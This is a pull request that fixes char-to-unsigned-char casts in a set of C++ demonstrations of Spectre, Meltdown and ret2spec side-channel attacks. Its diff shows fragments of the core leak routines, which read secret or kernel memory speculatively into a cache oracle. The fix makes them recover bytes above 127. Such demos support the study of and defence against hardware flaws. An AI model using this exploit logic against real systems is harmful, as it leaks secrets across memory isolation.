### PR TITLE
Casting chars to unsigned chars.

### DIFF
--- a/demos/cache_sidechannel.cc
+++ b/demos/cache_sidechannel.cc
@@ -115,7 +115,7 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
 
 std::pair<bool, char> CacheSideChannel::AddHitAndRecomputeScores() {
   static size_t additional_offset_counter = 0;
-  size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0x7F;
+  size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0xFF;
   ForceRead(GetOracle().data() + mixed_i);
   additional_offset_counter = (additional_offset_counter + 1) % 256;
   return RecomputeScores(static_cast<char>(mixed_i));

--- a/demos/meltdown.cc
+++ b/demos/meltdown.cc
@@ -62,11 +62,13 @@ static char leak_byte(const char *data, size_t offset) {
     // value of the in-bounds access is usually different from the secret value
     // we want to leak via out-of-bounds speculative access.
     size_t safe_offset = run % strlen(public_data);
-    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[safe_offset]));
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[safe_offset]));
 
     // Access attempt to the kernel memory. This does not succeed
     // architecturally and kernel sends SIGSEGV instead.
-    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[offset]));
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[offset]));
 
     // SIGSEGV signal handler moves the instruction pointer to this label.
     asm volatile("afterspeculation:");

--- a/demos/meltdown_ud.cc
+++ b/demos/meltdown_ud.cc
@@ -61,13 +61,15 @@ static char leak_byte(const char *data, size_t offset) {
 
     // Successful execution accesses safe_offset and loads ForceRead code into
     // cache.
-    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[safe_offset]));
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[safe_offset]));
 
     // Guaranteed invalid opcode on aarch64. Raises SIGILL.
     asm volatile(".word 0x00000000");
 
     // Architecturally unreachable code.
-    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[offset]));
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[offset]));
 
     std::cout << "Dead code. Must not be printed." << std::endl;
 

--- a/demos/ret2spec.cc
+++ b/demos/ret2spec.cc
@@ -22,7 +22,6 @@
 #include "instr.h"
 
 // TODO(asteinha) Implement support for MSVC and Windows.
-// TODO(asteinha) Investigate the exploitability of PowerPC.
 
 // Private data that is accessed only speculatively. The architectural access
 // to it is unreachable in the control flow.
@@ -65,7 +64,7 @@ static void speculation() {
   // Everything that follows this is architecturally dead code. Never reached.
   // However, the first two statements are executed speculatively.
   const std::array<BigByte, 256> &isolated_oracle = *oracle_ptr;
-  ForceRead(isolated_oracle.data() + static_cast<size_t>(
+  ForceRead(isolated_oracle.data() + static_cast<unsigned char>(
       private_data[current_offset]));
 
   std::cout << "If this is printed, it signifies a fatal error. "

--- a/demos/spectre_v1.cc
+++ b/demos/spectre_v1.cc
@@ -79,7 +79,7 @@ static char leak_byte(const char *data, size_t offset) {
         // This branch was trained to always be taken during speculative
         // execution, so it's taken even on the 2048th iteration, when the
         // condition is false!
-        ForceRead(isolated_oracle.data() + static_cast<size_t>(
+        ForceRead(isolated_oracle.data() + static_cast<unsigned char>(
             data[local_offset]));
       }
     }

--- a/demos/spectre_v1_indirect_jumps.cc
+++ b/demos/spectre_v1_indirect_jumps.cc
@@ -130,7 +130,7 @@ static char LeakByte(size_t offset) {
       // Speculative fetch at the offset. Architecturally it fetches
       // always from the public_data, though speculatively it fetches the
       // private_data when i is at the local_pointer_index.
-      ForceRead(isolated_oracle.data() + static_cast<size_t>(
+      ForceRead(isolated_oracle.data() + static_cast<unsigned char>(
           accessor->GetDataByte(offset, read_private_data)));
     }
 

--- a/demos/spectre_v4.cc
+++ b/demos/spectre_v4.cc
@@ -91,7 +91,7 @@ static char leak_byte(const char *data, size_t offset) {
       // Speculative fetch at the local_offset. Architecturally it fetches
       // always at the safe_offset, though speculatively it prefetches the
       // unsafe offset when i is at the local_pointer_index.
-      ForceRead(isolated_oracle.data() + static_cast<size_t>(
+      ForceRead(isolated_oracle.data() + static_cast<unsigned char>(
           data[local_offset]));
     }
 


### PR DESCRIPTION
Cast of char with ascii code between 128 and 255 to size_t gives wrong results (extremely high numbers instead of the ASCII codes). Casting it first to unsigned char and then to size_t implicitly seems to work correctly.